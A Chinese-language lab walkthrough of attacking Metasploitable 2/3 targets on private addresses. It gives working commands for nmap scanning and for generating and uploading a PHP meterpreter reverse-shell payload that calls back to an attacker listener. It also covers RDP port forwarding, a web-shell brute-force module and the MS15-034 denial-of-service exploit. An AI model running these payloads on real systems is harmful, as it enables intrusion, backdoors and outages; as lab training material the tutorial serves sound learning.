metasploitable2基于ubantu的渗透演练环境。Rapid7官方长时间未更新,导致跟不上当前的节奏。metasploitable3出世。
metasploitable2配合metasploit的模块进行使用,速度很快。
metasploitable3更加难被攻破,有些漏洞在metasploit中没有漏洞利用模块,需要测试人员自己挖掘。
一台metasploitable是不够用的,真实攻击中都会牵连到很多服务器和计算机,它可以扩展,将metasploitable3安装到多台终端内,建立相关节点。
以下部分是渗透例子之一:从用nmap发现靶机存在多少端口,然后利用kali自带的DAVtest检测是否存在上传漏洞,到生成payload,到打开msf,加载exploit/multi/handler模块,设置好本地的端口与地址
推荐参考资料:https://jingyan.baidu.com/article/7f766daf9cced24100e1d046.html 这是对win7系统的攻击
面对靶机时,踩点:nmap网络扫描工具 【kali nmap的使用】
nmap -sS -sV -v -n -p- -oX demon.xml 192.168.1.151 【内网靶机不需要解析DNS】
扫描结果关注到8585端口 存在 http php dav等应用 【对扫描结果的解读】
DAVTest上传测试的可执行文件,渗透测试快,轻松确定是否启用DAV服务攻击。 【漏洞测试】
msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.1.152 LPORT=5555 -f raw >davtext.php 【生成反向链接攻击载荷,后门】
msfconsole 【生成载荷以后,本地也要启动服务】
msf > use exploit/multi/handler 【生成载荷以后,本地也要启动服务】
set PAYLOAD php/meterpreter_reverse_tcp 【生成载荷以后,本地也要启动服务】
show options 【看一些设置有些什么东西】
set LHOST 192.168.1.152
set LPORT 5555 【设置一下,跟载荷对应上】
davtest 【看一下帮助信息,用于生成以下命令】
davtest -url http://192.168.1.151:8585/uploads -uploadfile davtest.php -uploadloc DavTestDirXp317s2YNZmKZKU/demon.php 【上传攻击载荷到靶机】
exploit 【处于监听状态,靶机一点文件这个地方就会弹出meterpreter会话】
help 【看一下meterpreter的帮助信息】
shell 【跟dos命令差不多】
rdesktop 192.168.1.151:3389 【手动链接一下远程桌面,看看有没有防火墙】
portfwd -h 【看一下meterpreter的端口转发帮助信息】
portfwd add -l 7777 -p 3389 -r 192.168.1.151 【将本机的7777端口转发到目标机的3389端口】
rdesktop 127.0.0.1:7777 【本地转发设置好了以后,访问本地就等于访问了目标机,这就是转发的情况体现】
meterpreter > background 【退出】
msf exploit(handler) > back 【退出】
msf > services
msf > workspace -a davtest 【创建一个工作区】
msf > db_ 【看一下数据库功能】
msf > db_import demon.xml 【数据库导入看一下扫描结果的报告】
msf > services 【看一下扫描结果的报告】
ssh -L 3389:loaclhost:3389 [email protected] 【将本机3389转发到对方3389,这里需要寻找ssh的账号密码】
nmap -p 3389 192.168.1.151 【扫描一下3389】
nmap -p 3389 127.0.0.1 【扫描一下本机的3389】
rdesktop 127.0.0.1:3389 【设置好本地的端口转发后,直接访问本地就等于访问目标机器的IP+端口】
官方wiki 无语了,中国菜刀都被他们看见了。
https://github.com/rapid7/metasploitable3/wiki/Vulnerabilities
1.chinese caidao ----中国菜刀,加入了中国菜刀元素:一句话木马 位置:http://localhost/caidao.asp
2.80端口 --http MS15-034/CVE-2015-1635 HTTP远程代码执行漏洞(远程蓝屏代码)(远程溢出漏洞)
微软IIS 6.0以上的windows server 2008 R2/2012/2012 R2以及windows 7/8/8.1系统都会受到这个漏洞影响
模块位置 msf:use auxiliary/dos/http/ms15_034_ulonglongadd
进阶:如果找到其他应用软件的各种漏洞利用模块,如上,要弄一个人将变得极其简单化。
【危害还是非常大的,不要玩火,不得攻击他人。打不过你报警来凑】
msf > search caidao 【漏洞利用模块举例】
msf > use auxiliary/scanner/http/caidao_bruteforce_login 【菜刀扫描模块】
show options 【查看设置】
set RHOSTS 192.168.1.151 【设置目标机】
set THREADS 10 【设置线程】
set TARGETURI /caidao.asp
run
search ms 15_034 【搜索远程蓝屏代码漏洞编号】
use auxiliary/dos/http/ms15_034_ulonglongadd 【执行蓝屏代码漏洞的载荷模块】
show options
set RHOSTS 192.168.1.151
exploit 【服务器马上蓝屏】
其他参考资料
hacking metasploitable 2
http://www.youtube.com/watch?v=jDqmEY_3zY&t=1625s&index=3&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD
www.youtube.com/watch?v=JoV1aSuy1XU&index=4&list=PL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD
www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&t=33393s&index=1
MSF精华合集 ZANYAR MATRIX发布的
www.youtube.com/watch?v=8z12kdEw2v8&list=PLPL17Q7Iw6SshlCNN1pVIkFR4B4mXBqPRdD&index=1&spfreload=10
书籍
菜鸟腾飞 :metasploit渗透测试平台之应用 --飞飞
T00LS metasploit 第一季度 第二季 ---羽翼